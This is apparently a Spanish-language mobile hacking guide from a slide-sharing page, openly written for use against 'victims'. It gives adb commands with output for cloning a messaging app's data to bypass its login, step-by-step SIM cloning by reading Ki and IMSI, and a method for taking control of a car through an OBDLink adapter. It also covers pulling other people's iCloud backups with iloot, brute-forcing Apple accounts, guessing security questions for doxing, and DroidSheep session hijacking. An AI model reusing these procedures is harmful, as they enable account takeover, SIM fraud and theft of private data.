SALTEANDO   LA   ASIGNADA   Y   ESTO   FUNCIONA   SOLO   PARA   VERSIONES
ANTIGUAS DE BTICINO.
14CONTROLAR VEHICULO DESDE TU CELULAR CON OBDLINK
LX BLUETOOTH
Ahora podemos controlar un auto con ayuda de OBD el cual es un producto valorado en 79$
dolares en amazon cuenta con una aplicación personalizada para iOS.
https://www.amazon.com/gp/product/B00H9S71LW/ref=as_li_tl?
ie=UTF8&camp=1789&creative=390957&creativeASIN=B00H9S71LW&linkCode=as2&tag=thedr
oideffec-20
una de las cosas que traemos con el hacking en este producto es que nosotros teniendo lo
siguiente:
1) Un ceular android
2) La aplicación OBDLink
3) Conexión via Bluetooth “con esto bastaria para scannear y buscar el dispositivo y
conectarnos.
Ahora un ejemplo de la busqueda de la conexión de nuestro celular buscando un punto en
comunicación via Bluetooth con el dispositivo en nuestro auto o en el autro de nuestra
victima:
Y activado observaremos un punto de conexión cercano con el auto:
Abrimos la aplicación y preisonamos en conectar:
Presionamos en conectar y establecemos conexión con el dispositivo al hardware instalado al
vehiculo por medio de una conexión Bluetooth.
- Mapa grafico explicativo -
Si no lo hemos dicho tambien existe una conexión entre la aplicación a un red wifi y lo puedes
hacer sencillamente desde la aplicación y tendras el mismo remoto control del vehiculo y
visualizacion de estado de este.
Al pesar de los problemas de conexión WiFi a un individuo con la aplicación y que camine por la
calle y se encuentre con esta red WiFi protegida por WPA2 todos los dispositivos utilizan una
misma contraseña:
Observamos en el hardware donde dice la contraseña de esta red:
15ATACAR APLICACIONES ANDROID CON “DATA-CLONE-
ATTACK” METODO
Un 0day investiado por SuperHei lo llamo “Data-clone-Attack” se puede omitir la autenticación
de contraseña, cuando el usuario de inicio de sesión de la aplicación y ajuste "recordar
contraseña" algunas aplicaciones es definir.
Procedimiento De Ensayo:
1. abierto dos emulador.
> adb devices
Lista de dispositivos conectados
dispositivo emulador-5554
dispositivo emulador-5556
ambos dispositivos se instalan
(https://play.google.com/store/search?q=com.tencent.mobileqq&c=apps),Ofcourse, también
se pueden utilizar otras aplicaciones para probar.
2) iniciar sesión en la aplicación "emulador-5554" y asegúrese de elegir el "recordar
contraseña".
a continuación, tire de los datos de la aplicación en el PC.
Vamos a la terminal de nuevo: escribimos:
>adb -s emulator-5554 pull /data/data/com.tencent.mobileqq/ d:aab
pull: building file list...
3) empujar los datos a "emulador-5556"
>adb -s emulator-5556 push D:aab /data/data/com.tencent.mobileqq/
4) -adb shell "emulador-5556"
>adb -s emulator-5556 shell
# ls -l /data/data/
ls -l /data/data/
drwxr-x--x app_1 app_1 2012-09-24 02:43 com.android.htmlviewer
drwxr-x--x app_35 app_35 2012-12-06 07:17 com.tencent.mobileqq
y obtener el propietario com.tencent.mobile qq es "app_35".
Debido a que los datos de empuje es root.
# ls -l /data/data/com.tencent.mobileqq
ls -l /data/data/com.tencent.mobileqq
drwxrwxr-x root root 2012-12-06 07:17 shared_prefs
drwxrwxr-x root root 2012-12-06 07:16 databases
drwxrwx--x app_35 app_35 2012-12-06 07:10 cache
drwxrwx--x app_35 app_35 2012-12-06 07:16 files
drwxr-xr-x system system 2012-12-06 07:17 lib
por lo que necesitamos a chown:
# cd /data/data/com.tencent.mobileqq
cd /data/data/com.tencent.mobileqq
# chown app_35 *
chown app_35 *
# ls -l
ls -l
drwxrwxr-x app_35 root 2012-12-06 07:17 shared_prefs
drwxrwxr-x app_35 root 2012-12-06 07:16 databases
drwxrwx--x app_35 app_35 2012-12-06 07:10 cache
drwxrwx--x app_35 app_35 2012-12-06 07:16 files
drwxr-xr-x app_35 system 2012-12-06 07:17 lib
pluma de la aplicación en "emulador-5556", y tienen ingrese en el qq com.tencent.mobile en
"emulador-5556".
Cómo obtener el contenido de los datos: es clave para la realización del ataque. algunos como
esto:
Ya tiene privilegios de super
bajo el intérprete de comandos como la demo, u puede eludir la autenticación de contraseña
utilizada "Data-Clone Attack".
(Cross-site-scriptin en Android)
app + webview + xss(or webkit xcs vul) = "Data-Clone"
En la versión anterior de Android, aplicaciones o XSS webkit androide xcs vul puede leer el
contenido del archivo local de:
http://www.80vul.com/android/android-0days.txt
Ventaja:
Así vista web de la aplicación tiene los permisos de archivos de lectura a los datos de la
aplicación. cuando un usuario de la aplicación visite un enlace URL, se pueden clonar los datos.
16CLONANDO SIM EL SIM DE TU VICTIMA
Ha sido un trabajo para el area de delitos informaticos en multiples sedes de todo el mundo
donde los agentes policiales del equipo de delitos informaticos aplican las tecnicas forenses
informaticas pero todo con la finalidad de recolectar informacion en los siguientes componentes
del hardware:
1) SIM
2) SD
3) Unidades Flash
4) Memoria Interna y secundaria.
SIM :tiene un algoritmo para autentificar al subcriptor en la red y el numero de telefono.
Acceso SIM:
1) El acceso se realiza mediante una clave PIN
2) Cuando la SIM redcibe eneria, lo primero que solicita es el PIN que desbloquea el acceso
logico al contenido de la tarjeta
3) Sin el pin de acceso logico a la tarjeta no es factible. es posible aunque no de forma
predeterminada que la tarjeta no presente PIN.
CLONANDO UNA SIM:
HARDWARE:
GRABADORA DE PIC TIPO LUDIPIPO
GRABADORA EEPROM
TARJETA CON MICROPROCESADOR DONDE GRABA. SE UTILIZA EN TARJETAS COOLWAFER
SOFTWARE:
SIM SCAN: PERMITE OBTENER LOS CODIGOS IMSI Y KI
ICPRO: GRABA EL PIC
WINEXPLORER: GRABA LA EEPROM
ICCID:CIRCUITO INTEGRADO DE IDENTIFICACION
IMSI:SUBSCRIBER IDENTIFICADOR
QUE TIENE LA SIM COMO TAL:
1) MENSAJES RECIBIDOS
2) NUMEROS DE TELEFONOS
3) ULTIMAS LLAMADAS
PROCESO DE CLONACION SIM:
NECESITAMOS UN SIM CARD READER PARA INSERTAR LA SIM DE LA VICTIMA Y LO PODEMOS
CONSEGUIR EN VENTA EN ALIBABA LO PUEDES CONSGUIR EN LA SIGUIENTE DIRECCION:
HTTPS://WWW.ALIBABA.COM/SHOWROOM/SIM-CARD-READER-WRITER.HTML
REQUERIMOS:
1) TARJETA SIM EN BLANCO
2) LECTOR DE TARJETA SIM
3) SOFTWARE PARA GENERAR EL CONTENIDO DE SIM EN BLANCO
PROCESO:
1) QUITAR LA SIM DE SU TELÉFONO, LO COLOCA EN EL LECTOR DE TARJETAS SIM
LEER EL CÓDIGO DE KI Y EL IMSI
LEER LA TARJETA SIM PARA KI Y EL IMSI UTILIZANDO EL SOFTWARE
LA ESCRITURA EN LA TARJETA EN BLANCO
1) PONER LA TARJETA EN BLANCO EN EL LECTOR
2) SELECCIONE ESCRITURA PARA SIM
3) SELECCIONAR EL ARCHIVO .DAT A AHORRAR ANTES
4) SE LLEVARÁ UNOS 10 MINUTOS PARA ESCRIBIR
FINALIZANDO : “SU TARJETA ES CLONADA”
SI INTENTA HACER 2 LLAMADAS AL MISMO TIEMPO, UNO VA A IR A TRAVÉS DE, EL OTRO DIRÁ
LLAMADA FALLA, Y AMBOS LOS TELÉFONOS TENDRÁN LOS MISMOS MENSAJES, TEXTO Y VOZ, Y
AMBOS RECIBIRÁN LAS MISMAS LLAMADAS, PERO SÓLO UNO PUEDE HABLAR A LA VEZ.

Más contenido relacionado

La actualidad más candente

Seguridad informática
Seguridad informáticaSeguridad informática
Seguridad informáticaEduardo1601
 
Internet de las cosas
Internet de las cosasInternet de las cosas
Internet de las cosastico2llorente
 
Internet de las cosas
Internet de las cosasInternet de las cosas
Internet de las cosastico2llorente
 
Seguridad informatica
Seguridad informaticaSeguridad informatica
Seguridad informaticaLorena Arroyo
 
LinuxWeek 2010 - Client Side Attacks
LinuxWeek 2010 - Client Side AttacksLinuxWeek 2010 - Client Side Attacks
LinuxWeek 2010 - Client Side AttacksMauricio Velazco
 
Técnicas activas de Caza Detectando y destruyendo a los Botnet
Técnicas activas de Caza Detectando y destruyendo a los BotnetTécnicas activas de Caza Detectando y destruyendo a los Botnet
Técnicas activas de Caza Detectando y destruyendo a los Botnetjohandry Espin
 
Hackeando plataformas móviles
Hackeando plataformas móvilesHackeando plataformas móviles
Hackeando plataformas móvilesHacking Bolivia
 
Seguridad y ataques de im en entornos corporativos
Seguridad y ataques de im en entornos corporativosSeguridad y ataques de im en entornos corporativos
Seguridad y ataques de im en entornos corporativosTensor
 
Actividades antivirus
Actividades antivirusActividades antivirus
Actividades antivirusmaryurrea9625
 

La actualidad más candente (17)

Seguridad informática
Seguridad informáticaSeguridad informática
Seguridad informática
 
Internet de las cosas
Internet de las cosasInternet de las cosas
Internet de las cosas
 
Internet de las cosas
Internet de las cosasInternet de las cosas
Internet de las cosas
 
Seguridad informatica
Seguridad informaticaSeguridad informatica
Seguridad informatica
 
Hacking etico remington
Hacking etico remingtonHacking etico remington
Hacking etico remington
 
LinuxWeek 2010 - Client Side Attacks
LinuxWeek 2010 - Client Side AttacksLinuxWeek 2010 - Client Side Attacks
LinuxWeek 2010 - Client Side Attacks
 
Seguridad en la red
Seguridad en la red Seguridad en la red
Seguridad en la red
 
Técnicas activas de Caza Detectando y destruyendo a los Botnet
Técnicas activas de Caza Detectando y destruyendo a los BotnetTécnicas activas de Caza Detectando y destruyendo a los Botnet
Técnicas activas de Caza Detectando y destruyendo a los Botnet
 
Se siente usted seguro con sus dispositivos móviles
Se siente usted seguro con sus dispositivos móvilesSe siente usted seguro con sus dispositivos móviles
Se siente usted seguro con sus dispositivos móviles
 
Hackeando plataformas móviles
Hackeando plataformas móvilesHackeando plataformas móviles
Hackeando plataformas móviles
 
Seguridad en VOIP addons 2016
Seguridad en VOIP addons 2016Seguridad en VOIP addons 2016
Seguridad en VOIP addons 2016
 
Seguridad y ataques de im en entornos corporativos
Seguridad y ataques de im en entornos corporativosSeguridad y ataques de im en entornos corporativos
Seguridad y ataques de im en entornos corporativos
 
Expo hacking etico
Expo hacking eticoExpo hacking etico
Expo hacking etico
 
Actividades virus
Actividades virusActividades virus
Actividades virus
 
Presentacion astrid
Presentacion astridPresentacion astrid
Presentacion astrid
 
Actividades antivirus
Actividades antivirusActividades antivirus
Actividades antivirus
 
Shuabang Botnet
Shuabang BotnetShuabang Botnet
Shuabang Botnet
 

Similar a Guía completa de seguridad móvil

Secuestro de sesiones
Secuestro de sesionesSecuestro de sesiones
Secuestro de sesionesTensor
 
Secuestro de sesiones
Secuestro de sesionesSecuestro de sesiones
Secuestro de sesionesTensor
 
Smartphone: Herramienta de Bolsillo de un Hacker.
Smartphone: Herramienta de Bolsillo de un Hacker.Smartphone: Herramienta de Bolsillo de un Hacker.
Smartphone: Herramienta de Bolsillo de un Hacker.Dylan Irzi
 
Secuestro de sesiones Vía DroidSheep
Secuestro de sesiones Vía DroidSheepSecuestro de sesiones Vía DroidSheep
Secuestro de sesiones Vía DroidSheepTensor
 
Seguridad informática
Seguridad informáticaSeguridad informática
Seguridad informáticaGisela Ab
 
Seguridad informática
Seguridad informáticaSeguridad informática
Seguridad informáticayudilar
 
Seguridad informática
Seguridad informáticaSeguridad informática
Seguridad informáticayudilar
 
Análisis de malware en Android -.Bsides Chile 2014
Análisis de malware en Android -.Bsides Chile 2014Análisis de malware en Android -.Bsides Chile 2014
Análisis de malware en Android -.Bsides Chile 2014Julian Maximiliano Zarate
 
Test de intrusión
Test de intrusiónTest de intrusión
Test de intrusiónnoc_313
 
Presentacion Spyware
Presentacion SpywarePresentacion Spyware
Presentacion Spywarekarensita220
 
Inseguridad wireless-sfd- final
Inseguridad wireless-sfd- finalInseguridad wireless-sfd- final
Inseguridad wireless-sfd- finalsp1b0t
 
Uso del troyano cybergate ok
Uso del troyano cybergate okUso del troyano cybergate ok
Uso del troyano cybergate okTensor
 
Troyanizando y Auditando Android - HoneyCON
Troyanizando y Auditando Android - HoneyCONTroyanizando y Auditando Android - HoneyCON
Troyanizando y Auditando Android - HoneyCONMatías Moreno Cárdenas
 

Similar a Guía completa de seguridad móvil (20)

Secuestro de sesiones
Secuestro de sesionesSecuestro de sesiones
Secuestro de sesiones
 
Secuestro de sesiones
Secuestro de sesionesSecuestro de sesiones
Secuestro de sesiones
 
Smartphone: Herramienta de Bolsillo de un Hacker.
Smartphone: Herramienta de Bolsillo de un Hacker.Smartphone: Herramienta de Bolsillo de un Hacker.
Smartphone: Herramienta de Bolsillo de un Hacker.
 
Secuestro de sesiones Vía DroidSheep
Secuestro de sesiones Vía DroidSheepSecuestro de sesiones Vía DroidSheep
Secuestro de sesiones Vía DroidSheep
 
Seguridad informática
Seguridad informáticaSeguridad informática
Seguridad informática
 
Seguridad informática
Seguridad informáticaSeguridad informática
Seguridad informática
 
Seguridad informática
Seguridad informáticaSeguridad informática
Seguridad informática
 
Análisis de malware en Android -.Bsides Chile 2014
Análisis de malware en Android -.Bsides Chile 2014Análisis de malware en Android -.Bsides Chile 2014
Análisis de malware en Android -.Bsides Chile 2014
 
Proyecto 6
Proyecto 6Proyecto 6
Proyecto 6
 
Recuperacion de equipos extraviados
Recuperacion de equipos extraviadosRecuperacion de equipos extraviados
Recuperacion de equipos extraviados
 
Test de intrusión
Test de intrusiónTest de intrusión
Test de intrusión
 
Foca
FocaFoca
Foca
 
Test de intrusion
Test de intrusionTest de intrusion
Test de intrusion
 
Presentacion Spyware
Presentacion SpywarePresentacion Spyware
Presentacion Spyware
 
Seguridad informática
Seguridad informáticaSeguridad informática
Seguridad informática
 
Inseguridad wireless-sfd- final
Inseguridad wireless-sfd- finalInseguridad wireless-sfd- final
Inseguridad wireless-sfd- final
 
Uso del troyano cybergate ok
Uso del troyano cybergate okUso del troyano cybergate ok
Uso del troyano cybergate ok
 
Seguridad informática
Seguridad informáticaSeguridad informática
Seguridad informática
 
Troyanizando y Auditando Android - HoneyCON
Troyanizando y Auditando Android - HoneyCONTroyanizando y Auditando Android - HoneyCON
Troyanizando y Auditando Android - HoneyCON
 
Seguridad informatica basica virus
Seguridad informatica basica virusSeguridad informatica basica virus
Seguridad informatica basica virus
 

Último

locomotas v siclo.ppt de ingenieria de minas
locomotas v siclo.ppt de ingenieria de minaslocomotas v siclo.ppt de ingenieria de minas
locomotas v siclo.ppt de ingenieria de minasMirkaCBauer
 
Buscadores, SEM SEO: el desafío de ser visto en la web
Buscadores, SEM SEO: el desafío de ser visto en la webBuscadores, SEM SEO: el desafío de ser visto en la web
Buscadores, SEM SEO: el desafío de ser visto en la webDecaunlz
 
actividad.06_crea_un_recurso_multimedia_M01_S03_M01.ppsx
actividad.06_crea_un_recurso_multimedia_M01_S03_M01.ppsxactividad.06_crea_un_recurso_multimedia_M01_S03_M01.ppsx
actividad.06_crea_un_recurso_multimedia_M01_S03_M01.ppsx241532171
 
NUVO PROGRAMAS DE ESCUELAS NUEVO-ACUERDO-CTE.pdf
NUVO PROGRAMAS DE ESCUELAS NUEVO-ACUERDO-CTE.pdfNUVO PROGRAMAS DE ESCUELAS NUEVO-ACUERDO-CTE.pdf
NUVO PROGRAMAS DE ESCUELAS NUEVO-ACUERDO-CTE.pdfisrael garcia
 
libro de Ciencias Sociales_6to grado.pdf
libro de Ciencias Sociales_6to grado.pdflibro de Ciencias Sociales_6to grado.pdf
libro de Ciencias Sociales_6to grado.pdfFAUSTODANILOCRUZCAST
 
Historia de la Medicina y bases para desarrollo de ella
Historia de la Medicina y bases para desarrollo de ellaHistoria de la Medicina y bases para desarrollo de ella
Historia de la Medicina y bases para desarrollo de ellajuancamilo3111391
 
PRIMARIA 1. RESUELVE PROBLEMAS DE FORMA MOVIMIENTO Y LOCALIZACIÓN 2 (2).pptx
PRIMARIA 1. RESUELVE PROBLEMAS DE FORMA MOVIMIENTO Y LOCALIZACIÓN 2 (2).pptxPRIMARIA 1. RESUELVE PROBLEMAS DE FORMA MOVIMIENTO Y LOCALIZACIÓN 2 (2).pptx
PRIMARIA 1. RESUELVE PROBLEMAS DE FORMA MOVIMIENTO Y LOCALIZACIÓN 2 (2).pptxRodriguezLucero
 
Institucion educativa la esperanza sede la magdalena
Institucion educativa la esperanza sede la magdalenaInstitucion educativa la esperanza sede la magdalena
Institucion educativa la esperanza sede la magdalenadanielaerazok
 
MODELO CARACTERIZACION DE PROCESOS SENA.
MODELO CARACTERIZACION DE PROCESOS SENA.MODELO CARACTERIZACION DE PROCESOS SENA.
MODELO CARACTERIZACION DE PROCESOS SENA.imejia2411
 
2º SOY LECTOR PART 2- MD EDUCATIVO (6).pdf
2º SOY LECTOR PART 2- MD  EDUCATIVO (6).pdf2º SOY LECTOR PART 2- MD  EDUCATIVO (6).pdf
2º SOY LECTOR PART 2- MD EDUCATIVO (6).pdfFernandaHernandez312615
 
INSTITUCION EDUCATIVA LA ESPERANZA SEDE MAGDALENA
INSTITUCION EDUCATIVA LA ESPERANZA SEDE MAGDALENAINSTITUCION EDUCATIVA LA ESPERANZA SEDE MAGDALENA
INSTITUCION EDUCATIVA LA ESPERANZA SEDE MAGDALENAdanielaerazok
 
rodriguez_DelAngel_MariaGPE_M1S3AL6.pptx
rodriguez_DelAngel_MariaGPE_M1S3AL6.pptxrodriguez_DelAngel_MariaGPE_M1S3AL6.pptx
rodriguez_DelAngel_MariaGPE_M1S3AL6.pptxssuser61dda7
 
COMPETENCIAS CIUDADANASadadadadadadada .pdf
COMPETENCIAS CIUDADANASadadadadadadada .pdfCOMPETENCIAS CIUDADANASadadadadadadada .pdf
COMPETENCIAS CIUDADANASadadadadadadada .pdfOscarBlas6
 
institucion educativa la esperanza sede magdalena
institucion educativa la esperanza sede magdalenainstitucion educativa la esperanza sede magdalena
institucion educativa la esperanza sede magdalenajuniorcuellargomez
 

Último (14)

locomotas v siclo.ppt de ingenieria de minas
locomotas v siclo.ppt de ingenieria de minaslocomotas v siclo.ppt de ingenieria de minas
locomotas v siclo.ppt de ingenieria de minas
 
Buscadores, SEM SEO: el desafío de ser visto en la web
Buscadores, SEM SEO: el desafío de ser visto en la webBuscadores, SEM SEO: el desafío de ser visto en la web
Buscadores, SEM SEO: el desafío de ser visto en la web
 
actividad.06_crea_un_recurso_multimedia_M01_S03_M01.ppsx
actividad.06_crea_un_recurso_multimedia_M01_S03_M01.ppsxactividad.06_crea_un_recurso_multimedia_M01_S03_M01.ppsx
actividad.06_crea_un_recurso_multimedia_M01_S03_M01.ppsx
 
NUVO PROGRAMAS DE ESCUELAS NUEVO-ACUERDO-CTE.pdf
NUVO PROGRAMAS DE ESCUELAS NUEVO-ACUERDO-CTE.pdfNUVO PROGRAMAS DE ESCUELAS NUEVO-ACUERDO-CTE.pdf
NUVO PROGRAMAS DE ESCUELAS NUEVO-ACUERDO-CTE.pdf
 
libro de Ciencias Sociales_6to grado.pdf
libro de Ciencias Sociales_6to grado.pdflibro de Ciencias Sociales_6to grado.pdf
libro de Ciencias Sociales_6to grado.pdf
 
Historia de la Medicina y bases para desarrollo de ella
Historia de la Medicina y bases para desarrollo de ellaHistoria de la Medicina y bases para desarrollo de ella
Historia de la Medicina y bases para desarrollo de ella
 
PRIMARIA 1. RESUELVE PROBLEMAS DE FORMA MOVIMIENTO Y LOCALIZACIÓN 2 (2).pptx
PRIMARIA 1. RESUELVE PROBLEMAS DE FORMA MOVIMIENTO Y LOCALIZACIÓN 2 (2).pptxPRIMARIA 1. RESUELVE PROBLEMAS DE FORMA MOVIMIENTO Y LOCALIZACIÓN 2 (2).pptx
PRIMARIA 1. RESUELVE PROBLEMAS DE FORMA MOVIMIENTO Y LOCALIZACIÓN 2 (2).pptx
 
Institucion educativa la esperanza sede la magdalena
Institucion educativa la esperanza sede la magdalenaInstitucion educativa la esperanza sede la magdalena
Institucion educativa la esperanza sede la magdalena
 
MODELO CARACTERIZACION DE PROCESOS SENA.
MODELO CARACTERIZACION DE PROCESOS SENA.MODELO CARACTERIZACION DE PROCESOS SENA.
MODELO CARACTERIZACION DE PROCESOS SENA.
 
2º SOY LECTOR PART 2- MD EDUCATIVO (6).pdf
2º SOY LECTOR PART 2- MD  EDUCATIVO (6).pdf2º SOY LECTOR PART 2- MD  EDUCATIVO (6).pdf
2º SOY LECTOR PART 2- MD EDUCATIVO (6).pdf
 
INSTITUCION EDUCATIVA LA ESPERANZA SEDE MAGDALENA
INSTITUCION EDUCATIVA LA ESPERANZA SEDE MAGDALENAINSTITUCION EDUCATIVA LA ESPERANZA SEDE MAGDALENA
INSTITUCION EDUCATIVA LA ESPERANZA SEDE MAGDALENA
 
rodriguez_DelAngel_MariaGPE_M1S3AL6.pptx
rodriguez_DelAngel_MariaGPE_M1S3AL6.pptxrodriguez_DelAngel_MariaGPE_M1S3AL6.pptx
rodriguez_DelAngel_MariaGPE_M1S3AL6.pptx
 
COMPETENCIAS CIUDADANASadadadadadadada .pdf
COMPETENCIAS CIUDADANASadadadadadadada .pdfCOMPETENCIAS CIUDADANASadadadadadadada .pdf
COMPETENCIAS CIUDADANASadadadadadadada .pdf
 
institucion educativa la esperanza sede magdalena
institucion educativa la esperanza sede magdalenainstitucion educativa la esperanza sede magdalena
institucion educativa la esperanza sede magdalena
 

Guía completa de seguridad móvil

  • 1. Autor: kelvin parra Grupo De Trabajo: KelvinSecTeam Escrito: 25-08-2016
  • 2. 1 DEFINICION: Este nuevo articulo completo de seguridad mobil consiste en visualizar los riesgos y aplicar tecnicas de hacking mobile desde un celular donde existen distintos y multiples metodos de la seguridad del mobil en tecnicas de explotacion, herramientas y definiciones que ayudaran a entender cada paso de los metodos que explicaremos y en algunos casos proteccion mobil. Black hat hacking “hacker de zombrero negro” : En el blackhat hacking en seguridad mobil se define de “hackers” con propositos malignos con fines de investigacion y exponer la vulnerabirilidad para darle una ventaja al pirata inforamtico utilizar la tecnica o vender esta tecnica llamadas “0day” en el sitios DarkNets por un cambio de bitcoin. Research Security “Investigador De Seguridad” : En este caso solo se basaria en indentificar el erorr y en algunos casos explotar la vulnerabirilidad con fines de reportar la vulnerabirilidad y llevarla a algun soporte tecnico de la empresa para que arregle el problema presentado por el investigador de seguridad. Area De Trabajo: Redes: C onsiste en el estudio o del uso automatizado de herramientas para testear redes WPA o WPA2. Aplicación Web Security: Este es el que lleva el cargo de testear y buscar vulnerabirilidades web.
  • 3. 2 SEGURIDAD IPHONE: Ante la variacion entre el uso de iphone o android la mas afectada es android aunque queremos incorporar la seguridad iphone para dar una detallada explicacion sobre de lo que se trata “Seguridad mobil” y se efectua en cualquier sistema operativo. Rasgos De Seguridad: 1) Red De Comunicación 2) Reverse Engginer 3) Privacidad 4) Esquemas De direcciones 5) Notificaciones De Inserccion 6) Almacenamiento De Datos De La Aplicación Los hackers son aquellos que buscan investigar estos rasgos ahora lo compartimos y comerciamos a usuarios que quieren aprender y pueda ser una ayuda o una guia para la motivacion a otro usuarios seguir investigando y buscar nuevos metodos.
  • 4. 3 JAILBREAK EN IPHONE Definicion: Jailbreak nunca fue permitido por las empresas pues personas han creido que el Jailbreak es un metodo que fue aceptado vor las empresas para permitir la ejecucion de cualquiera aplicación en el dispotivo de ubicación externa es decir como por ejemplo la descarga de malware en portales webs y hacer estas “Supuestas” aplicacioens ejecutables. Herramienta Automatizada: Todo surgio en un exploit y conjunto de terminales el duscubrimiento de un fallo de seguridad que permitia hacer una funcion que no permitia tanto Iphone Y Android pero ahora con el estudio de la logica del rompimiento de la seguridad y la ayuda de programadores con pensamiento hacking han desarrollado variedades de herramientas para realizar el jailbreak automatizado desde un software que puede correr en distintos sistemas operativos de tu ordenador. Herramientas a utilizar durante jailbreak Iphone: 1) Pwnage Tool 2) JailBreakMe 3) Greenpois0n
  • 5. 4 EMPEZAR JAILBREAK CON PWNAGE TOOL Categoria De herramientas automatizadas para jailbreak: Pwnage Pwnage: En conjunto para hacer jailbreak al iPhone, iPod touch , y el iPhone 3G. ARM7 Go (de iOS 2.1.1) : por jailbreak tethered en el iPod touch 2G. Limera1n Exploit :T ethered jailbreak para el iPhone 3GS, iPod touch 3G, iPad, iPhone 4, iPod touch 4G y Apple TV 2G. usb_control_msg Exploit : también conocido como "steaks4uce para jailbreak tethered en el iPod touch 2G. Recomendación de pagina: https://www.theiphonewiki.com/wiki/Jailbreak_Exploits Gracias a Theiphonewiki por dar soporte a los exploits de cada version en Iphone y vamos ahora a utilizar estas herramientas y definirlas: Versiones que permite realizar Jailbreak PwNAGE TOOLS:
  • 6. Pwnage Tool: Es una herramienta de jailbreak iOS para Mac OS X que fugas de por crear un IPSW. Se le permite cambiar logos de arranque y añadir paquetes pre-instalado para el IPSW. Una vez creado un IPSW que se puede utilizar para restaurar a través de iTunes. Disponibilidad: Windows Y MAC Pwnage: http://blog.iphone-dev.org/post/1359246784/20102010-event Firmware: http://www.felixbruns.de/iPod/firmware/ Una vez descargado tanto el Pwnage Y Firmware ejecutamos el “Pwnage” y nos aparecera como a continuacion:
  • 7. Ahora debes clicekar en un modelo: Seleccionamos: Ahora nos saldra un opcion de busqueda de la IPSW para los que no saben que es un fichero IPSW es u fichero que sirve para restaurar Tu iPhone o Ipad, Ipod.
  • 9. Ahora nos saldra un menu Ahora vamos a Cydia Packages y una vez dentro de esa opcion del menu presionamos en “Refresh” Ahora seleccionamos 1 del listado “Open SSH” y presionamos en en la flechita “Azul” que se encuentra en la parte inferior derecha.
  • 10. Selecciona en build y presionamos en la flechita azul de nuevo. Ahora presionamos en “SAVE” y comenzara a aplicar la accion de construccion del firmware.
  • 11. Ahora por ultiimo nos dara un mensaje donde dice “Conecto El Dispositivo” y Active En Modo DFU. Conectamos el dispositivo y activamos el modo DFU. Y Jailbreak Completo. Informacion: Este es el metodo automatizado del jailbreak en un dispositivo Ipod , Iphone, Ipad. Promesas De Jailbreak ante Iphone: 1) Jailbreak – Permite instalar cualquiera otra aplicación externa. 2) Jailbreak – tiene como significado saltar la seguridad del dispositivo y obtener privilegios.
  • 12. 5 IPHONE BACKUP & ICLOUD: Un dia publicamos en kelvinsecurity el metodo automatizado de usar y obtener por medio de una herramienta ejecutada en el lenguaje de programacion python que aplica la siguiente funcioens: 1) Permite lanzar ataques de fuerza bruta a cuentas de Apple 2) Permite obtener la backup de una cuenta de Icloud. Direccion de descarga: https://github.com/hackappcom/iloot 1) Herramineta iloot permitiria extraer la backup de una cuenta de Apple Requisitos: Sistema operativo: Linux o windows Python 2x Instalacion: pip install -r requirements.txt ejecucion inicial y lista de comandos: python iloot.py -h usage: iloot [-h] [--threads THREADS] [--output OUTPUT] [--combined] [--snapshot SNAPSHOT] [--itunes-style] [--item-types ITEM_TYPES [ITEM_TYPES ...]] [--domain DOMAIN] [--keep-existing] apple_id password Necesitas el (Usuario – Contraseña de la cuenta Apple)
  • 13. apple_id Apple ID password Password Ejecucion en la terminal: iloot.py email password  Transcurso de la sesion - Ahora nos da el siguiente mensaje: “Quiere usted descargar el libro de direcciones, mensajes y fotos” Si => (Yes)
  • 14. Y asi de automatizado funciona la herramienta. Ficheros Y Su Contenido: AddressBook.sqlitedb información de contacto y datos personales como nombre, dirección de correo electrónico, cumpleaños, organización, etc ... AddressBookImages.sqlitedb imágenes asociadas con los contactos guardados Call_history.db entrante y registros de llamadas salientes, incluyendo números de teléfono y marcas de tiempo Mensajes de texto y multimedia com.apple.accountsettings.plist datos sobre todas las cuentas de correo electrónico que se configuran en el Aplicación de correo electrónico de Apple com.apple.network.identification.plist datos de la red inalámbrica, incluyendo la dirección IP, la dirección IP del router, SSID y marcas de tiempo consolidated.db Tiendas GPS los datos de seguimiento Voicemail.db Mensajeria De Voz Existe otra herramienta y es la de fuerza bruta por que muchas vecess hemos notado distintos tipos de seguridad pero no hemos visto uno que “Salte la autentificacion” y entre de inmediatamente a los correos de apple en ese caso existen 2 funciones que podemos usar para lanzar el ataque. 1) Por fuerza bruta: la fuerza bruta se podra utilizar desde una herramineta automatizada en lenguaje python o desde un portal web desarrollada en PHP y con el uso de un diccionario de contraseñas normalmente se utilizar el ataque de fuerza bruta por que “Apple” no bloquea los intentos de acceso en caso a una direccion IP.
  • 15. 2) Preguntas De Seguridad: Hemos notado preguntas de seguridad debiles para los amantes del doxing se les ara facil y es que las preguntas de seguridad suelen ser algo sencillas en cuanto las preguntas mas facilitadas como “En que ciudad nacio tu madre” o “el nombre de tu perro” ect. 6 APLICACIONES PENTESTING Existe una gran variedad de herramientas de pentesting que puedes ejecutarla en tu android son aplicaciones que necesitan que tu telefono se encuentre roteado para tener los permisos necesarios para empezar a realizar las funciones como las siguientes: 1) Scanneo y identificacion de dispositivos en una red 2) Scanneo y visualizacion del trafico en la Red Wifi 3) Realizar Ataques MITM 4) Scanner de puerto 5) Conexión a puertos y identificar 6) Sacar informacion de un host 7) Ataques DoS 8) Auditacion de password y aplicación de direccionarios para fuerza bruta 9) Establecer conexiones remotas Puerto Scanner: Se encargar lanzar un mapeo de los puertos entre ellos lo mas conocidos dentro de una IP local o de un servidor entre los puertos se encuentran los mas conocidos y son los puertos 8080 :80 .5900 .21 .23. Ataque MITM: El Man-in-the-middle que consiste en que el atacante se interpone entre el cliente y el servidor. Con este ataque demostraremos como se pueden obtener credenciales en una conexión segura. Ahora vamos a sniffear la red con una aplicación llamada droidsheep es utilizada en android:
  • 16. Direccion De Descarga: http://droidsheep.downloadxapp.com/ 7 ROBAR SESIONES CON DROIDSHEEP Bueno antes que todo hay que estar conectado a una red wifi y empezar a scannear desde la aplicación android DROIDSHEEP existen un nivel entre DROIDSHEEP y ZANTI y es que ZANTI se encuentra mejor personalizada y con mas opciones. Secuestro De Sesion: Sólo hay un cliente dentro de la red inalámbrica que se es el único que envía y recibe paquetes
  • 17. Una petición HTTP envía será recibido por el punto de acceso inalámbrico y, usando enrutamiento TCP / IP, el paquete será enviado al servidor web. Si la red inalámbrica está activada la seguridad (por ejemplo, usando WPA-2 y una clave fuerte), un atacante no es capaz de leer cualquier paquete HTTP y por lo tanto no puede robar identifica la sesión del usuario. con sólo escuchara la red. Capturando Sesiones:
